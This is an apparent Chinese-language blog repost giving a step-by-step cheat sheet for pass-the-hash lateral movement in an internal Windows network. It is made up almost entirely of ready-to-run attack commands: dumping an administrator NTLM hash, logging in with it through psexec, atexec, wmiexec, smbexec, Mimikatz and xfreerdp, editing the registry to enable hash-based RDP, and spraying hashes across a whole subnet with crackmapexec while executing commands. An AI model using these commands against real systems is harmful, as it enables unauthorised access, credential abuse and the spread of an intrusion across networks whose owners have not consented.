1.获取密码
在cs下面
loginpasswords
获取密码哈希: c6de864a0d3ba9437e6a1e0789d4a844
2.psexec 哈希登录
psexec -hashes :c6de864a0d3ba9437e6a1e0789d4a844 ./administrator@192.168.100.129
3.Atexec哈希登录
利用139和445端口,它会创建计划任务-执行计划任务-删除计划任务
Atexec -hashes :c6de864a0d3ba9437e6a1e0789d4a844 ./administrator@192.168.100.129 “whoami”
4.Wmiexec哈希登录
利用135端口
wmiexec.exe -hashes :c6de864a0d3ba9437e6a1e0789d4a844 ./administrator@192.168.100.129 “whoami”
5.Smbexec哈希登录
和psexec类似
Smbexec.exe -hashes :c6de864a0d3ba9437e6a1e0789d4a844 ./administrator@192.168.100.129
6.Mimikatz
rivilege::debug
sekurlsa::pth /user:administrator /domain:workgroup /ntlm:c6de864a0d3ba9437e6a1e0789d4a844
7.hash 进行rdp登录
使用hash远程登录RDP,需要开启"Restricted Admin Mode"
REG ADD “HKLM\System\CurrentControlSet\Control\Lsa” /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f //开启Restricted Admin mode
8.利用mimikatz进行rdp登录。
sekurlsa::pth /user:administrator /domain:192.168.100.164 /ntlm:c6de864a0d3ba9437e6a1e0789d4a844 “/run:mstsc.exe /restrictedadmin”
9.利用xfreerdp进行rdp登录,kali自带该工具
xfreerdp /v:192.168.100.164 /u:administrator /pth:c6de864a0d3ba9437e6a1e0789d4a844 /cert:ignore
10.pth批量爆破
利用crackmapexec进行密码喷洒,喷洒本地administrator
crackmapexec smb 192.168.100.0/24 -u administrator -H NTLM-HASH.txt(收集到的hash字典) -x whoami -d workgroup
涉及工具:
https://github.com/maaaaz/impacket-examples-windows
原文:https://xz.aliyun.com/t/12550
内网PTH攻击
最新推荐文章于 2023-08-07 08:56:07 发布